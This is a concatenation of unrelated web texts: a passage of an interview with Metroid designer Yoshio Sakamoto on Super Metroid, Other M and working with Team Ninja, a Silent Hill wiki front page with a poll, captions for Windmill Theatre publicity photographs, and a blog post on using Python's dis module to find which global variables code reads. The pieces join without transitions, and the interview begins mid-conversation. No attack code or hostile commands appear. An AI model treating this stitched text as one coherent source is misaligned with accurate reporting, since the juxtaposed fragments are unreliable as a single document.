Nowadays , if I take a trip or go see a movie or even just conversations that I 've had with people -- those can all result in some sort of moment or interesting image that I cough up later when I 'm working on game content .
But , of course , even now , if I saw something in a game , I do n't think I would be stealing it so much as recognizing , " Oh !
That 's a really interesting way to do that . "
But I have to say that I have n't really seen anything lately that has come up as a huge hint for how to proceed in creating the next game , in other games .
When you look at Mario , the progression is very smooth .
But the evolution of the Metroid series is not , because it 's repeatedly changed developers .
I do n't think that it 's made the Metroid series worse ; it actually makes it interesting , because we 're always going to be surprised by how it evolves .
Is that intentional , or is that just the circumstances of how it 's developed ?
YS : When we worked on the very first Metroid game , please keep in mind that was very early in video game history .
At that time , no one really paid a whole lot of attention to who made what part of the game ; rather , an entire department made a game .
It was a collaborative effort .
Of course , we did contract out some of the coding on the game to Intelligent Systems at the time .
The idea of the design game from the entire department .
Now , once we got into the days of , say , Metroid II , this was on Game Boy .
By that time , a lot of people had developed a lot more know - how , and even the programming techniques had improved then , so it was possible to do things with a smaller team .
There were even some projects where we did not need to include Intelligent Systems .
I came in again after Metroid II came out , so that was the sort of environment that I came into .
I think I may have discussed a little bit in my GDC speech how I was very moved by the last scene in Metroid II , and that stimulus became my motivation and inspiration in creating Super Metroid .
But when I worked on Super Metroid , Intelligent Systems was helping with the coding -- now , when I say Intelligent Systems , by that time it was already a completely different set of people who then went on to code Super Metroid .
Then I went on to make Fusion and Zero Mission , after which was the Prime series .
Now , the Prime series was made by Retro , of course , and , being a different developer , they had a very different worldview for this game .
You can say it 's still the same Metroid , but it 's a different , original concept .
There is n't necessarily a direct connection between those initial concepts .
From Super Metroid on -- these were mostly handheld games through this period -- even if the partner changed , I was still working on the project .
The central character of Samus , the strong fighting woman who did n't shoot that baby Metroid at the end of Metroid II , was something that I made sure I protected , even as we went through all of these different projects with different partners .
I think Super Metroid really stands out as one of the most elegant game designs the industry 's produced .
Why do you think that people are still so passionate about this game that was released , at this point , quite a long time ago ?
YS : Well , certainly , when we were making Super Metroid , I thought , " I want to make something lasting that will be fun even if played much later . "
All I can say is I 'm really happy that we succeeded in that goal .
But , if I had to take a guess as to what the lasting appeal is , perhaps it 's the impression left on people by the drama of the game .
You have the baby Metroid who 's stolen in the beginning Super Metroid , and Samus goes after the baby .
The baby is getting larger and larger as it grows and feeds , and when they are first reunited the baby Metroid attacks Samus but then remembers who Samus is and runs off .
Later , when Samus is in trouble , that baby Metroid comes back and helps her .
All of these dramatic moments really are connected to the strong feelings that people have about relationships , and that leaves quite an impression on you .
I guess , if there 's any lasting appeal for the game , that has to come from the deep impression that 's left by that sort of thing .
That game does a very good job of telling a story with almost no text , and that 's part of what makes the game ; also , I think just the actual design and the atmosphere , too .
But something that we 're struggling with as an industry is finding the right balance of storytelling .
I notice you definitely are stepping up the storytelling for Other M , so I was interested in your thoughts on story balance and storytelling .
YS : Well , when you 're telling the kind of story that we had with Super Metroid -- where Samus has this baby Metroid that is imprinted on her , it grows up , is separated , comes back , and remembers her and saves her -- those are things that can have a really deep impression on you without using words at all because these events are very easy to understand as you view them .
But what we 're going to be doing in Other M is more about Samus 's internal workings , her feelings , and her background .
To express something like that , you really have to use words ; it 's unavoidable if that 's your goal .
So perhaps the best thing to say is that the idea of elegance is to use no more than is needed ; and , in this case , we 're going to use more words , but we 'll try not to use any more than we have to .
Of course , there 's a lot of different ways to tell a story , and we 're going to have alternating sequences of movies and then action sequences .
Both of them really need to hold up in terms of storytelling ; they both have to do their share of the work .
You can't rely on just one .
But from the player 's perspective , it needs to feel seamless ; the whole thing needs to feel like an action game that has that kind of consistency .
So you really have to sit down and ask yourself what you 're trying to express and how you 're expressing it , and then , once you 've got something out there , you need to look at it very carefully and ask yourself , " Does this work ? "
If it works , then that was the right decision ; you did a good job .
But you can't really be halfway committed to something like storyline in a game .
You can't make an action game and then decide at the very end , " You know , this is missing something . "
Just tacking on a storyline at that point would actually be detrimental to the experience ; you should probably just stop and leave it as it was .
The idea is that you have to decide clearly at first , and it even makes sense to follow a little bit of a narrative structure where you think about sort of setting up the background , having a little bit of development to understand the characters and the conflicts , and then some sort of large turn or dénouement and then , of course , the resolution at the end .
This is a Japanese approach to narrative called kishōtenketsu , but it 's probably pretty common in Western understanding as well .
But , ultimately , rather than talk about how to include a storyline in a game , the best thing I could say is :
Please , play the game !
I put everything I know into this , and so if you play through and get a sense of what I was trying to accomplish , then that 's a better answer than I could certainly tell you right now .
I want to talk to you about the relationship with Team Ninja .
You 're working with Hayashi - san , I believe , on the game .
I 've met him , and he is a young , smart guy .
I want to talk about the relationship you guys have ; how you chose them and your working relationship with that team .
YS : First I 'll address how we chose Team Ninja for this collaboration .
I had come up with the Other M storyline and the rough outline for the game design , but I realized that what we had around us was basically a team that had been working on handheld games for quite awhile and we were looking at trying to make a 3D game here , so we realized that we needed some help .
We looked out there at who'd be available and who'd be interested in both the concept and the storyline , and when we finally contacted Team Ninja they were very interested in the project and realized this was also a very good fit for them .
Once we had a clear understanding of the shared goals , we were able to move forward .
As for my relationship with Mr. Hayashi , probably the best way to say it is that I like to see him as a peer .
I absolutely feel that we are equals .
As you say , he 's smart , he 's young , and he 's absolutely excellent at what he does .
He works hard and he works well , but he also has a really amazing , dynamic brain .
He 's able to put his hand on a lot of different things and succeed .
So I thought he would be a fantastic fit for this project .
Now , when we first brought him on , I did n't just hand him a pile of documents and say , " Here you go .
Please make this game . "
Rather , we talked about what was essential and what was good in the Metroid series and tried to figure out how best to use his arts background and know - how to really push those goals forward .
One thing that I really appreciate about him is he can really say some unexpected things every once in awhile that seem to come out of left field , but , since I know that we have the same end - goal in mind , even if we occasionally disagree or are surprised by each other 's means or routes of getting there , we know we 're going to end up in a good place .
It 's the right kind of conflict , and our individuality comes out in the best way possible .
One thing that 's always struck me when making games with other people -- and , honestly , you 're always making games with other people ; it 's not something that you usually come on as an individual endeavor -- is that you have to find all of the different ways necessary to express yourself to the other team members .
There are some team members every once in awhile where , no matter how you describe something in words , it seems to just not be getting across .
But one thing I especially appreciate about Mr. Hayashi is that he seems to have some sort of intuitive sense to understand me .
Perhaps it 's because we already have shared interests and similar backgrounds , but I feel like he just gets me .
There 's something about this partnership that feels destined .
I would like to ask you , since you 've met him , what you thought of Mr. Hayashi .
I met him first when he was working on Ninja Gaiden Sigma , and I immediately thought , " Any guy who can stand up to Itagaki has probably got something going for him . "
That was my first impression .
In Japan , often when companies work with an external developer , they treat them like a subcontractor .
They hand them planning documents , and they may have them make the game exactly as it stands in those documents .
But Nintendo , in particular with Metroid , seems very open .
I got to play the Other M demo ; you can definitely feel Team Ninja .
Obviously , as you said , with Prime , you can definitely feel Retro 's style .
You 're open to that collaboration .
What about that collaboration excites you and allows that freedom for the creativity to shine through ?
YS : Well , it 's a little hard to say exactly how the collaboration on Prime might have resulted in the areas where you really felt Retro shined through there because I was n't actually very closely involved with that project , but you can certainly say that there are a lot of common Metroid elements ; those are always the foundation for any of these projects , even if you have a lot of other elements arranged in a slightly different way .
What you 're dealing with is a large vessel that is very firm and can hold all of those elements and still retain its own identity .
The best way to accomplish that , to find that sort of firmament that you can then put different arranged elements into , is to find the things that you can't budge on -- find the things that are essential , important , and you do n't want to change .
Once you 've got that established , you can bring in all sorts of talented people and let them collaborate and contribute to what you have there .
Ultimately , what you 're going to end up with is something where the Metroid world - sense is still intact : this is a really good game .
And certainly this has to be possible on other types of game projects ; all you really need to do is make sure that you 're very clear in your communication and you talk to people a lot about those goals .
As an end note to all of this , I 'd have to say that , if you wanted to maintain some sort of unilateral , top - down control over every aspect of the project , that 's probably easier to do in the long run , but that 's not something that I 've ever wanted .
I do n't feel like that 's something that yields the best results .
Return to the full version of this article
Copyright © UBM
Tech ,
All rights reserved
Welcome to Silent Hill Wiki
Featured article
Dead by Daylight : Chapter XVI - Silent Hill is the sixteenth chapter in the 4v1 asymmetrical multiplayer survival horror game Dead by Daylight .
It is a crossover with the Silent Hill series that features Cheryl Mason ( plus cosmetic skins of Lisa Garland and Alessa Gillespie ) and Pyramid Head as playable characters .
Featured video
Dead by Daylight Silent Hill Spotlight Trailer -3
Poll
Who is your favorite protagonist ?
It 's been 10 years since the first poll was made on the Silent Hill wiki , let 's rewind and see if the answers have changed !
Harry Mason 64 James Sunderland 198 Henry Townsend 33 Travis Grady 11 Alex Shepherd 19 Rose Da Silva 9 None .
There are better characters now !
25
The poll was created at 20:11 on July 17 , 2019 , and so far 359 people voted .
Please wait , submitting your vote ...
Helping out
To write a new article , just enter the article title in the box below .
The Windmill Girls
Publicty Photographs of the Windmill Girls in various poses from the Windmill Theatre Tableaux
Above - A Windmill Theatre Publicity Photograph .
Left to right are Lucy Winters , Jo Saunders , Honor Chapman and Eileen Wooding .
The photograph was reproduced in the Windmill Theatre souvenir programme no .37 .
Above - A Windmill Theatre Publicity Photograph - Back row standing left to right are Honor Chapman , Lucy Winters , Jennifer Betteridge and Adele Cornell .
Seated left to right are Brenda Mills , Gina Delrina and Shendah Pearce .
And standing in the centre of the photograph is Iris Chapple .
Above - A Windmill Theatre Publicity Photograph .
Seated left to right are Rita Hammerton , Mandy Mayer , Elizabeth Hill , and Iris White , and posing centre is Jennifer Betteridge .
Above - Air -craft legs of Windmill Girls in the air minded " Our Flying Start " opening number of the new Vivian Van Damm production - ' Film and Art Reel ' Click to see the article this image comes from .
Above - Heather Fitzsimmons in a Windmill Theatre Publicity Photograph which was reproduced in the Windmill Theatre souvenir no .37 .
Above - Image from the Revudeville programme 32 - Click to see the Programme
Above - " Heading for a cruise " - The Revudebelles , showing Valerie , Eileen , Betty , Jean , Margaret , Lya , and Joyce Stemp .
From the Windmill Theatre Revudeville Programme ( 104 ) for the 25th April , 1938 .
- Courtesy Maurice Poole .
VALERIE , EILEEN , BETTY , JEAN , MARGARET , LYA and JOYCE STEMP .
Above - A 1950s Windmill
Theatre photograph , possibly taken by a Camera Club member - Courtesy Maurice Poole .
Above - A 1940 's official Windmill Theatre Co. , Ltd photograph .
The tableau artiste on the right hand side of the photograph appears to be Joan Rock - Photograph Courtesy Maurice Poole .
Above - Laura Henderson and members of the Windmill Theatre cast of ' When Knights were Cold ' pose for a photograph to celebrate the 6th anniversary of ' Revudeville ' on the 4th of February , 1938 , shown in the Revudeville programme No.98 .
' When Knights were Cold ' commenced on Monday the 8th of November , 1937 .
Reg O ' List and Joan Rock are in the photograph as is Laura Henderson ( Centre ) - Courtesy the Jill Millard Shapiro collection .
Above - A Publicty Photograph of two of the Windmill Girls , Gerry Oldham left and Ray Johnson right , which was also used in the Revudeville no .
148 " Snice in Iceland " .
Above -
A publicity photograph of Ray Johnson and other Windmill Girls which was also featured in the Windmill Theatre Souvenir programme 15 and Revudeville programme 156
Above -
A publicity photograph of Ray Johnson which was also featured in the Windmill Theatre Souvenir programme 15 and Revudeville programme 156
Above - A Publicty Photograph of Ray Johnson and David Dale also used in the Windmill Theatre Revudeville no .156 .
Souvenir no.14 " Champagne for Breakfast " .
Above - A Publicty Photograph of the Windmill Girls in various poses from the Windmill Theatre Tableaux which was also used in the Windmill Theatre Revudeville no .158 .
" Musical Comedy Reminiscences " with John Coleman , Jack Lockyer , Dickie Martyn , Ray Johnson , Olive Wright , Fay Hollingsworth , Diana Decker and the Revudebelles .
This is the only revue with 3 men and 4 women plus the Revudebelles in the programme .
The 4 Revudebelles are at the back of the photograph , one being Huia .
Above - Publicty Photographs of the Windmill Girls in various poses from the Windmill Theatre Tableaux .
Above - A Windmill
Theatre publicity photograph - Caption Reads ' Lucky Hal Bryan surrounded by lovely Stewardess in the Cruising scene in Revudeville 104 at the Windmill Theatre " .
- Courtesy Maurice
Poole who says : ' This photograph was in the official souvenir programme Nos. 101 - 114 .
To the right of Hal Bryan is Lya Leigh , the girl with the black hair .
Lya was photographed for the first nude photograph to appear in a British newspaper , ' The North London Recorder . '
That photograph was published on 12th August , 1938 and featured a scene with Lya on a cross with a gas mask on .
The photograph and many others of Lya were taken by Roye .
I have the standard programme for Revudeville 104 , and the Revudebelles in the scene are Jean , Lya , Eileen , Betty , Valerie , and Margaret .
Standing left to right at the back of this photograph are Valerie and Jean , and standing left to right in front are Eileen , Margaret , Lya and Betty . '
Above - A Publicity Photograph of some of the Windmill Girls - Courtesy Kevin Mayger , whose mother , Marlene Cork , passed away in 2011 and is captioned in the photograph .
Artistes featured in the photograph are Left to Right Marlene Cork , Hala Duncan , Eileen Wooding , and Rita Hammerton .
Above - A Publicity Photograph of some of the Windmill Girls - Courtesy Kevin Mayger , whose mother , Marlene Cork , passed away in 2011 and is captioned in the photograph .
The artistes in this photograph are Honor Chapman posing in the background , Fan dancers L to R Marlene Cork and Brenda Mills .
Above - A Publicity Photograph of some of the Windmill Girls - Courtesy Kevin Mayger , whose mother , Marlene Cork , passed away in 2011 and is captioned in the photograph .
Posing in the background is Honor Chapman and in the forground are L to R Marlene Cork , Brenda Mills and Vera Florey .
Above - A Publicity Photograph of some of the Windmill Girls - Courtesy Kevin Mayger , whose mother , Marlene Cork , passed away in 2011 and is captioned in the photograph - Posing L to R in the background are Honor Chapman and Elizabeth Hill , and foreground L to R , Vera Florey , Marlene Cork and Brenda Mills .
Recently I found myself , for my own obscure reasons , wanting to know ( at runtime , by introspection ) which variables a piece of Python code read .
At first glance , this looked fairly straightforward .
Python ’s eval statement takes three parameters : a code object to run , and two dictionaries for the global and local variables .
Since you can subclass a dictionary and override its getters it seemed trivial to monitor what was read , using some variation on a theme of :
python
class MonitorDict ( dict ) : def __init__ ( self , * prm , ** kw ) : dict .
__init__ ( self , * prm , ** kw ) self .
accessed = set ( ) def __getitem__ ( self , name ) : self.accessed.add( name ) return dict .
__getitem__ ( self , name )
( Depending on the detail needed , instead of returning the dictionary contents directly , you might want to wrap them in ‘ proxy objects ’ first , that had similar ‘ instrumentation ’ to monitor what was read from those , in turn . )
For locals , this works a treat .
Unfortunately , for globals , it does not .
As the eval documentation says :
The globals must be a dictionary and locals can be any mappping
We ca n’t pass our magic dictionary in to wrap the global variables , like we can with the locals .
Why eval insists on a vanilla dictionary , I ’m not sure — it ’s quite unPythonic ; duck typing is the norm — but I guess the CPython implementation depends on it for some reason .
I expect because reading the dictionary directly instead of checking for subclassed methods gives some performance advantage .
So I needed some darker , filthier magic .
Poking About In Bytecode
The answers we seek are contained in the code , so what if we examine it directly ?
Python source is compiled to bytecode which you can read from within Python itself easily — it ’s stored in the co_code member of a code object .
( A “ code object ” , by the way , is what you get if you call the built - in compile ( ) function on some source code .
There ’s also one for every function ( except built - ins / extension modules ) , in the function ’s func_code member .
Remember , in Python , everything is an object , even functions — with constructors and members and all that implies . )
If you print it out , though , it ’s pretty cryptic :
python
interactive shell :
>>> x = ' hi ' >>> def test ( ) : ... print x >>> test .func_code.co_code ' t \x00\x00GHd\x00\x00S '
Fortunately , Python has a disassembler in the standard library : dis .
Although it ’s not as Stygian as its name would suggest , it ’s slightly danker than we ’d like because it only outputs in human - readable text :
python
interactive shell ( ctd. ) :
>>> import dis >>> dis.dis( test ) 2 0 LOAD_GLOBAL 0 ( x ) 3 PRINT_ITEM 4 PRINT_NEWLINE 5 LOAD_CONST 0 ( None ) 8 RETURN_VALUE
While this is normally what people want , we ’re trying to examine code with code .
At least that LOAD_GLOBAL looks kinda promising , right ?
dis is itself written in Python , so it ’s easy enough to make a new version that returns something machine - readable instead .
I ’m not going to walk you through it here — it ’s mostly just a bunch of cut - and - paste — but I ’ve put a copy online in the new kibble section , a sort of overflow bucket for the odds and ends that have nowhere else sensible to go .
It ’s called discode.py , and contains the new disassemble function .
It returns a list containing a tuple for each bytecode instruction , constisting of the opcode name , the kind of argument it takes ( local , global , constant , None , etc ) and the value of the argument ( or None ) .
And , by way of examples , there ’s also a function that plucks out the names of the globals that a piece of code read ( even inside lambda functions it defines ) , returning them in a set .
It simply compares the opcode name to LOAD_GLOBAL as seen above , and also checks for code objects being loaded , and recurses on them .
